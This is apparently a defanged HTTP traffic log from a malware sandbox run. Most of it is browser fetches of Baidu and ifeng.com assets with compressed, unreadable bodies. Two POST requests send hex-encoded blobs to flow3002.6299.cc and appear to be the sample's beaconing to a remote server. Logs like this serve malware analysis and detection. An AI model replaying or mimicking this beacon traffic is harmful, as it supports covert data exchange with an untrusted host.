..v./.fU.3f. ....4.Gxa..0....JG..JG.%h..&...i.h.\nm.E.}e..,......5....
.z...Z&...=([email protected].....
Y.......=v.4.o...,.'3..^.'."..>._..5h..J.dTl....A.d.1v.., ..:.[.Q.(
..Gz.....^/.f.v..q.^.....O....k.;M.....WSP..f.......8.6.Ar...y9..~.._\
..v.(..C.4...]...'..q.,.l.Dvc..w......E...(.iQqg....g....4....}.o..,..
.T.......N....T..%E...(J.h.s4Z.UH.ZlI.He.q2..b..)C.F.....XG.(..GU.,f..
..X..k....Nt.G.!...Y...6X....`.p....5>..;.q.W.DS!.........'..'...^t
..w*....T..A|.C.=S.,.kd.Y.N....*c..3.G..v...R.o. ..BT...R..(....KG<<< skipped >>>

GET /cache/fpid/o_0108.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã%

x-flash-version: 11,6,602,168

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12; BD_CK_SAM=1; BD_HOME=0; BD_UPN=1121314151; ISSW=1; H_PS_BBANNER=1; H_PS_645EC=3c70RzuHf3OnguuWgstPA6+cKl7trAD7CLhsdbMb/ukLv2VuYggcyzNSbIA


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:49 GMT

Server: Apache

Last-Modified: Tue, 27 Jan 2015 06:20:22 GMT

ETag: "5f1-50d9c3feb5580"

Accept-Ranges: bytes

Cache-Control: max-age=315360000

Expires: Sun, 13 Apr 2025 14:10:49 GMT

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Content-Length: 1544

Connection: Keep-Alive

Content-Type: application/x-shockwave-flash
...............CWS.....x.}U.n.F......G.....FQ...e......JU....QQ/.E.-8"
G.c....l_.. ..7h.`.^.......}.....jlu.K@....|..9..j....0...G..c.LBh....
*......SZ.....F|.5..o.ZE..^..vJ}!..Z....z.Yu.^m}kk..n.66............R#
^. `[email protected]@e.5n....W[...&P..`m.......3......oL2.....u....6.
Z......5...G.l..........T.qSi#..6L!.),.h......?....M..!.N..G.....m..#.
9..7.)..r&.i...)......xc.U...<.C&x.%....."..i.M.z......C..n.f..S...
..W...FU.......S.|....V.6.A.O*.u.&.j.].....8.AF.'....t.....l._.-..q.k.
....l.........2..c[...n..G.M.. .5...._.....}...`k.C.......S.0..y....".
.<....1.Tw.#.S..=&....4..O=..-...3.&tFp.~.8.g.........f.....]S.TX.a
zC..&....F...."..l.... Gg...b.S!..gi....C.]...6w.L.^....&;.!p...,.>
>.Oh}...~&t.l$..o.,..c.......<......<....~Z.5#L;.g^....u...S.
k....[....Ur..}.u\r.O.1.F\.[.....D..=..C.`.J.u.i..vO..]0...... .k....'
....t..I..]N.16f..:.O.^k....3.T.IX..W.'...u.......'..".9..|..y.)..a.Q.
.s.L;..c.X:L?....1..#.H...<vL#..S\....w.4......5...V.."..<....sR
A*. .........=.,F?..._.7....h,.H.H.N.F1...X.$Bq....I.S..).Cq....Y..Pr.
..<.....)yHI...Q.D.O(Y..L.*%[email protected])....J>..3J.(.......%_P..d..|
I.]*.Qy..._..r...2....c$..~..9{...U..)..(.......^5r.G0..#.<$.P<.
O`$G....2B....o......H..>K_]...]v3.].l&..[9....uv..=....h.. .......
...).....5.|..,>9..N.^.I$...$y.!...`.f..|.I.........s..H$......te.]
..is.......o.......;.]ef..]t.n.l.]G....^..(.........Rm}...#DF.-....<
;..sc..X.^..?.VYL{P.l=..,4g.......r.........M9....wK....~....q...U>
...%....m?...Z$\..(,.....-...h?..#...C.\=......K...W..p},...z..=`.<<< skipped >>>

POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible)

Host: flow3002.6299.cc

Content-Length: 327

Cache-Control: no-cache

parems=1D324DD136232748AEE70117BC7907152CAEB1A80ECED9C2B8D7009F8345C36730AD379D5D68E07A621D2F23DCF71A6E0FE18F5612E938E7F4D672C5EA006C5833C1ED508532AC014B123EAD16CC4A798EC9ADB57184EDBC7475DB7275C064883BA7817EA7E5840D27F92A61CB6ED28D2AFBF42935D897C3F3A56DC6CEFD654B293A60757F50D146EC6A3E2F8C3B845F823DA1DAD4A67919891041A6625577F3
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 128

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 16 Apr 2015 14:10:17 GMT

D62863FAE68B8607704484A6A04125491C77642904F91F9D9403A3D6653CC634BD718A
92BB0F031A48F9B8942A7083006C6D6B1D918F78795FE9C19470E68ACFHTTP/1.1 200
 OK..Cache-Control: private..Content-Length: 128..Content-Type: text/h
tml; charset=utf-8..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.3
0319..X-Powered-By: ASP.NET..Date: Thu, 16 Apr 2015 14:10:17 GMT..D628
63FAE68B8607704484A6A04125491C77642904F91F9D9403A3D6653CC634BD718A92BB
0F031A48F9B8942A7083006C6D6B1D918F78795FE9C19470E68ACF....

POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible)

Host: flow3002.6299.cc

Content-Length: 167

Cache-Control: no-cache

parems=3B6D427D39170CE5008F14C41F3933E7777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF1A4F24C5DCF9EADA34220123F0C9A51B4183C709F4C234C79F447E3000E375424
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 96

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 16 Apr 2015 14:10:46 GMT

32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F
0F0924FF9486B9213262CCB928HTTP/1.1 200 OK..Cache-Control: private..Con
tent-Length: 96..Content-Type: text/html; charset=utf-8..Server: Micro
soft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date
: Thu, 16 Apr 2015 14:10:46 GMT..32A45B4F6626435761CCBF7971D304AB3076C
5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928..

GET /base/jQuery/jquery-1.9.1.min.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:30 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s3.v0-mow), ht h0-s3.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Tue, 12 Jan 2016 00:27:03 GMT

Age: 8171007

Content-Length: 32819

Content-Type: application/x-javascript

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Sat, 13 Apr 2013 02:11:16 GMT

Connection: keep-alive
............{{...7...."........o...v..q.[cg'-E..HPBL....RD....[kf0.Pq.
~.sNZ.....f......._..M...wg.?...vG.<8z2.........E...q...:z..GT.._.f
.....t.de.....uT..b.|.o6iv..._E..:.F.x...O..6..*?QUp....2U.4..6I.<.
T.%.E>....R1....4^..tIm...ZE.{5..3..<.....|4.3.D-.r.-o..]......4
[$....:Z...UUP_...........|....z.mF.r...f......Q..?..-3.0..F..^.F....l
.O........\..f.|1..t..NG2U.}tz.jxz.^G.o......./^\.>......#*........
../.../........|zp2{...N.3*....~.\../O'...g...g.;.~.M.Tx..,g.....).y..
w*@...i.^...]........2 ..n;.\.'..'/f....*.4:..oP...f..]Ul..2^.....V...
.....V.P.N....z......o3z.........aC..,.....K.\p...x......WiY%YR.v.*..^
.......<_oVI..a>*.xq....$8>....u%......n ..V?.Q.:..4....o.~.g
..Q...S_..Y.....G)..T.".......<......&...*..Z.t%[email protected].
h...X.*/. .H.....){4U.y...I`..&-.. y.....L.O....Lf..X<..1M.w.xD;;..
...3zgn...'S.....g.~3Jn.9-..... .....3..A..e#.....".-i.S..].9..3..=GE.
.,..R*.gs..j.M..0.._'.u......E.|.....K.Q'FY.H^..'.(.OK.\.-.T...8...Q..
..v||5J..Vq.}{.K2..K..z.R....o_..G..t.L....NF.W.}....."{.NLP|.T_......
..j..,P..q.Q..o..<.x...Q..t=..$nJ.%:S...,..N...*.......d.`....M...)
....T.7....|$...[......E..h.......`b.......iQ.w...-n>.=OIw..*......
..H...r.....h..V.Aj..&t..9M..is.j.t]~../...ik......l.p.....mT.=[E..7v.
...n./$...y=T.X.s...J......j.w.W.|.x..F..*..:....>K...d....f.......
...&...7./.2-..P......j.?X.p.....9u.Ae.0...D.....~f.......&...l6..3...
...i}.(.. m.Je.x...p5.:..d...gWz...G..@.*\.2/*..............>...g..
`...w....f.....\.D...#D...E.%.......G..s`K.*.WI...NI.......LeO...&<<< skipped >>>

GET /commonpage/1130/F-RequireJS.min.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:34 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1064.v0-mow), ht h0-s1064.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Mon, 16 Nov 2015 08:43:18 GMT

Age: 13066036

Content-Length: 10772

Content-Type: application/x-javascript

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Sat, 30 Nov 2013 08:56:46 GMT

Connection: keep-alive
...........}{...u.....jJ...]S=.}H..b...6m>6.Y/...EM..."..Z.....H.(.
.. ..Vv. ..X. [..c#...YR.....;.>.Vw.!C......s.=..9.n..M.<.E.....
[email protected]!........8....H......skwow.......p...s.A^g..J
...3.:..p.vJQ..a...9O.ir6..D.T.......N&........,]..9...G..8.&.Y8.g...Y
]...B..y....PTh..n....7.......:..Y%.j.'C..9..k..N]M."r..b.;..".R...S8.
OI..gh.:.U..z6K.....yY.......\....x@..>>.=?..U... ..FL...[...#I.
.(.^..(J.3r..[.A...Q..(.<O..rP..*....K&T.{......0..G...?9.o...=O...
?P.......y.:..#x.i~.L.k..I.......Q.E..e....A2.z....=....A......j.NQ$W(
...pQ..H..O........I...yY....E8......N..S...t{...A...? D.b....|&..Z.u-
.Vw.z.m.g.]..$.GE>.. .....L..Si.2.....6.lo....=..u..N.9.f.t....4...
.............m..*0\Q.)S?[,...S./...\.#...]..n..OO...._/[email protected].
.4..(a...0.~.......3H....V...3....K.......w.....d&<W.w........0.-..
5.="w..-..o.;.r>M ..].......X.b.U3.Y.B./....>5..$R.....dj..M....
...]A..pR...r;..cICU..k...<?...T.q.d..^...q.%S.-.. m..Q..........z`
..|[email protected](*S.e.....aX...)W...B...........bRS.
;{.-n..8.".$...E..eP.I0... ...`..b.y....5....*..Y2.......c..{.....`..w
*o..\.b.U.S..:............7,[email protected]@W.k? ..i.n..9wO.........3
.p0....N.....".|l...G\>...Q...\._.grgz.|..%...q.X...uMe$.."/n..Z.&.
w{....)^..%~3,jq.S........F\..S..=t..U..TZ..`....2..IOI.%J..8.m.......
..P.S....9......lo..7..hj..x.0..F......n&./....4............D..i.7w*h.
..........9... ..b....l.]V\. ..'.\Z$U.<) ...C..?....$......v..Xc...
..8.....P.D~l...Z.".......jL\.=3IG.....5!lHAz.y.A.q.F..Y.#.}.U.\?.<<< skipped >>>

GET /314bd925cdd17196/2014/1203/pc.css HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:34 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1090.v0-mow), ht h0-s1090.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Fri, 04 Mar 2016 00:07:56 GMT

Age: 3679358

Content-Length: 13049

Content-Type: text/css

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Wed, 03 Dec 2014 06:30:59 GMT

Connection: keep-alive
...........}k.c.u.w.......L..o....I3#.V........K..I.Mr..3="..`'.#...qv
7...6...be.H..e...3....:.....%.-.,!ib...V.:.:.:..`1z..M.4F...l.F..Yc1k
...I..D.I..$.I..d...h.....xZ.F..lL.....l.f......e.('.r.9.W'..Qp..G....
.uQ..Y..,V.b...f.|........z..U.....UO<..W.z....r..7.S..p1*....Q.6..
j1?..<.W..b^6...Yq4....cx....LJ.....l..M.U.yq|..('..8/..lz2?.......
 .....(..../....>`E..Q>...f.......W./.|.q.hy.1.........t}6o..i&g
t;kL........pV...:....b5......'...|ttm<....]...E....^.3.Ox...RhNB.G
....D.#j.&....IB...(gh._.....[9..b.X.b..<.G...>..[..b5.."...... 
H.N&.>....../$D.x.GY...a9}P..[b.yi.?....G...3./.^:.M..Y...6..Dv18F.
.Z..lZ>:.LG.b~|.......5........i>d...f7..<.1..F.._.J..#.a.V=Q
...j..y.Um.1'&.5..oE.&Q..#.!D.<.V....U!j..9.;R.fr^.W5!..5.b.s w....
. .T..wr.[.7W....UAP..%.e..vx.....#.d..3..a.TH....I..wtU...;...U....o5
....A....6r.[B._.t..u..3N....U.._1........R.bO....Xl.1<[.^......~..
..b~..Hk.8m.....2?).a.....v>......l.h..e..,`.$.."W<.)..Q..e.....
6..../..B..<..Dl]...F..]..7........Q9..Wl..&Y~V.4....M.e......r.GI.
.U1...:f.5......0../..k......B.......y)[email protected]&...}....4a.t.O...VX..
.......Y.X...@.=...!......CX..../..=1.. ...Qu........2#..j.=..?1..K...
..!..q.Zq......5u!. J.eq.O.*..:....!.s5.....n..\>..;....S.Iu...Nb.\
....K....x.dqV.!R..c)...'?._O..gO~......6x.>....|...~.]...)...p./7f
..Y ..&....n....-;...>Z...A.G.I.....Q..j{..@(V...<...dq5).f.1.o.
......G.....)cH.cz...2>v.....].v.G..r.........Z<.f..4.Yfr.......
.~.)..o..=.2.|....$l-....Y..g...&...p....U4....Z..r1.....n{.n...dg<<< skipped >>>

GET /a/2015/0311/fa.min.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:34 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1131.v0-mow), ht h0-s1131.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Thu, 10 Mar 2016 07:04:01 GMT

Age: 3135993

Content-Length: 4640

Content-Type: application/x-javascript

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Wed, 11 Mar 2015 07:03:23 GMT

Connection: keep-alive
.............r...WthG!#....Q...q.;....}.u...S...E*.h;........(...Lonb.
X,.....L.$.<M..IwIr.:Bf<.$..Y...U.}.........8.xv|....<...=..x
~..h..q.....h4...?..._...xtAfR.F...t.o|>e........0.7A...t.Cr;.$.`.a
...'o.:..o..)...oC.........`...?............)../...;=.x.a...tD.'......
.?B.a....?....E..4..6....e..,..u.... V.O..U:p.(t.Z...0N#...,.2.s....3.
.0.y2a.'S..2!n...\.R..{y.......Cr.....b...C6f@_ .E.FL..]y7L..W...D.Kk.
f.......^..^.M..7.fA..b..i..(.0..a:_..K.c....4.....e....\..i..F1.U....
9........E%6.g..q......I...FH ..0.</.i...?~.C..G1...7..'...W...-...
.JX.....j.i..19.0..&.....[*..h...9n0/.......K..vA..LR.<..."F.....|!
.Y.?.u..3......Gc..)v..E.f.A.$=.V.<.>.$...E...t..........T...q.X
...q\./..S.8.OI.=....f'.p.5.........*J..).]!.-...|.....4x......?.iSz..
. ....d.~j..5..ZHX4W..j4BE..U.d.%...-..C.."[email protected].#......tNa...%..a
....?8....m........oa.KC0. ....,_,.L..`>jk...u....Z..R.P.8ip....DTQ
.....C&.........F...3.:.2..d....c6...E*8.....i.K.az;.W .......3x...8..
.6M3...q....O..]F.....7.. WOzY...`H*......dH:3.ofR}.@..[....../...yq.s
p....p.Mw............=.........}.J.b.. .;.2....Z....8W3w..|........pOz
)..`......&.!.76.f.......1z-P.X.\.....1K./w......t..(....W..~..[<.Z
.1<.U"..=......\.r.p..n.a.k.}q. ..3.L..9I.H...>...g....{[email protected]
.WN.!....b},BR............).2 ....f<.. ...S......B...3.......&.q...
..5......:.......]...z.B.&DX\..K.*C..\......H(K...z.j.R..\.g..y.1X.K&%
....zS.a..][email protected].......<.. .3.....|U6.6...........G......2....
.M...nr.M..5....A.3............ ........_....x....P..Y.kY&.g.....#<<< skipped >>>

GET /commonpage/1129/v1/all.png HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:34 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1117.v0-mow), ht h0-s1117.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Tue, 12 Jan 2016 00:28:55 GMT

Age: 8170899

Content-Length: 11624

Content-Type: image/png

Last-Modified: Fri, 29 Nov 2013 07:36:01 GMT

Connection: keep-alive
.PNG........IHDR...U.................tEXtSoftware.Adobe ImageReadyq.e&
lt;...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:C2B1CA99C758E311B5A0B81393D8CDF0" xmpMM:DocumentID="xmp.did:ABBD
44B558C711E3AF53EF931EB2F571" xmpMM:InstanceID="xmp.iid:ABBD44B458C711
E3AF53EF931EB2F571" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> 
<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C2B1CA99C758E311B5A0B8
1393D8CDF0" stRef:documentID="xmp.did:C2B1CA99C758E311B5A0B81393D8CDF0
"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> &l
t;?xpacket end="r"?>Iv.Q....PLTE........"....U].tz....>J....%5.(
=..................Vr.... R....Z......]...........6X....Jr&........*..
..........w...."..... [email protected].........
.. ..\...........................................................[Q&..
*.....f...........E..................d``... **........................
..................................................................fff.
..........tRNS........................................................
..................................................................<<< skipped >>>

GET /base/origin/F-amd-1.2.0.min.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:37 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1088.v0-mow), ht h0-s1088.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Wed, 09 Dec 2015 08:51:39 GMT

Age: 11078338

Content-Length: 9241

Content-Type: application/x-javascript

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Sun, 03 Nov 2013 10:19:07 GMT

Connection: keep-alive
...........}...Iv..t...LVtu...y..,p..f.. .9.YW...UQ]9..,../.].dya..-?.
.m....A.-....X........s....M.d.........8q.q"...L.0X.u..j..6..U#.uV.0.&
gt;O.=.\oY..Dr=.....|.,.g\..{..O...N...?..7....q.<-.d......E#_.c...
LOS*..2..O.2..X.iQ.<.....{...eQ..s..<.j.N8.}.O.]n..5@!N.9.X.....
.........5...}.*..gU$#.$.0...^O.G.....,)g....`VP.{. ...`.d......O.....
. ...<1......M)[email protected]..~_.m.E.. ..q..2.f.j.OTG%t..j..A5\.y...\
..q5...nLMe.....h..U4y>..o..3....F..P.K.d..!.........7.. .........p
..YEk.e..Q\..q..B5...R.Q{.{.....z...R.."...Btp.;Wk...."g..h....X.c,..]
_.-..gG.,.qy....dx.U.p.e.;{7.g..Ld5.o...vKd ....0.%.>..i.-../?.g...
.u...Ru......]-..Z....(`..}#.A...7.$e..^d.x..wg)..J..I....N..(.G...=L.
d|.......Dai..#6....TX..bg#[email protected]..$.50.0.l..P.i..9.e.~.<.d...
v...I....a...Wv.!..Y&iyJ.W....r"p..~....t/.......?[.o........b....\.Y.
[email protected] T.X.e.G.rR.9..m.i.5...Af. .e.. ....T..........0..._.....Q.
.."4..m.Yj.O.(.4..(......1|.6K\.3....'c......J..T....|F.$...[9..V;....
:...Aos.L.<....'%>..8.4....../E...O...*."_.Y.,A.q;;.../.........
qu|\.._......h4....p.^[email protected].../G.....j~t..E.D
jA<.6..a...:....;[email protected]..<.XFl..,[email protected]...
.".!N....D^..................*OJOl..2....B..hO.B~m&..... ..i.../.....M
!..c(.... s.x3..X..$.4H...Jv.""@.;Y. ^...x....S4........"...&{.r.....V
...y.F..h.*.S..I....D.D.....r........T.E.....R.C..$. .'j..j5....m}..5.
2.Et...R.. .A>eC0....V!.4......D.!PS.9d.G.....V5...A......`.t......
.!..`...z .-.a.-)_v4...K....B..F.&*=.O[K.C[........50..j......U...<<< skipped >>>

GET /r/www/cache/static/global/img/icons_b5457670.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:19 GMT

Content-Type: image/gif

Content-Length: 30270

Connection: keep-alive

ETag: "763e-513bf21204ec0"

Last-Modified: Wed, 15 Apr 2015 08:28:19 GMT

Expires: Sat, 12 Apr 2025 08:46:45 GMT

Age: 105814

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Ohc-Content-Crc: 2070345553

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
GIF89a...........LL......._.V.....*3.d...........L..................rr
...............iii.........>......63_.OC........z.................D
. ...LLL6.....lr....t.........b...................C.....$........;....
...w...k.N............\\\..c..."""............f....t.........*........
FN..........)................nI..q..]....|.........S..4....6J.99......
..Q..............U...........d.....>.....j.....c...x...............
.............7..tss...B.....#...........m.....C........I..&.....]c....
.............OM.....O...........^......{..u.....|...  q...........-...
..n....................................rr.............................
..........:......$!866.@A,..yz~..:................__.....8............
...................................................I..................
..]..............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehi
HzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
dobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <
;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> &
lt;rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1
.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" x
mlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.
did:668B7AA8A504E3118BDBD6D25068E69D" xmpMM:DocumentID="xmp.did:FED478
60D6CB11E49D8FF2D41DA46D8E" xmpMM:InstanceID="xmp.iid:FED4785FD6CB11E4
9D8FF2D41DA46D8E" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F97F117407206811<<< skipped >>>

GET /r/www/cache/static/home/js/nu_instant_search_fb92f064.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:21 GMT

Content-Type: application/javascript

Content-Length: 6182

Connection: keep-alive

ETag: "48b9-5135dd8b24000"

Last-Modified: Fri, 10 Apr 2015 12:24:32 GMT

Expires: Tue, 08 Apr 2025 03:56:02 GMT

Age: 468859

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 1275962800

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
...........<k...u.. (X%.-......j.\.j.........K.$.......\..u..m.;c7O
w.....M..Ic ..g. .S.B..../H..r.........9..{..R...o.=..Di0~..kr_.H..!V.
.5iP.A...}W..uG..y.....I\W.........M.......a...5:.a.}w..6 .R3.I.&1.'8.
....!....ZW....^O.r...D!W.\.)H.._S..f.....[M........i...I..`.P7]..b..{
......i.w... <l.:.. .(.I.D...}..84..Z..7&-...9.R.P.L./.V.....].,G..
3....U...Y*4=.uH...d.......T........}..O._........6||.H6e..7.......Y5.
....^GW3-C.t ..H....p.dJw2.Cb..R..a...a;m.%.....kt..9[q/.`...K..:..L..
TK..n..kG.Q...w..c..{...K..%.t.........uqM......_...vI..-.A..J}...;..n
.mM...V.nwl..."..........v......t./...a......Q?.-.#.V....l]..s|....f".
.1..n.....$..n...c.Q5.].....8.v&..~..i}....=...[.......j2ug.U..$jh.4..
...A?pSP6.y.....D.e.R.....i..`.....jA.. Q.U.8L.QsU!.V.[k...........y.2
./~`\y..Z..P...uJ.....C.Q...mE.....|.J!.....F.n.t7......f@f.._..S....J
B.....<xp../F.zy5O..v....x<^...wo.....'o...........2..,.pg.....H
t...9$n.. UR...7...g/..x......}..i7a_.^.T.V.W. #.....^..-0h(?z.....P..
.d..a.....N2.P...4...'h.....!`.rM..MY#..w..k=..u.x'..v.uRo.y....~.....
...b...Lr..I.....6....q.ql..{..VZ\.A<.b.u|-.....AoJ.NR.==.x%>q8d
.j..U)f..%0.Q;}......`.jhC........C.....w.h..5..=....v..))...v2i#L.N.1
G%...>-$....)....G.......-Ef.R86[...\..<....$.jDw....n.&...!Its.
jh..F..VD.......9.^X*.......d. ...8..n..1....L.....Q..y...#.......a\..
...m.G?..u.A|.c..b].4.......5.Z.n......!...:'..A..,.......z.7v......1.
...o........ii_..w.(.>..!"....X..M.....o..f...#.6....yv.a...]c"4.{.
S.8BX.t-..F.......=....p..'..Z......3.2D.....b.A...Vie..9RZ:......<<< skipped >>>

GET /r/www/cache/static/baiduia/baiduia_b45d552b.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:21 GMT

Content-Type: application/javascript

Content-Length: 6014

Connection: keep-alive

ETag: "3e55-51204ce9b32c0"

Last-Modified: Tue, 24 Mar 2015 08:45:39 GMT

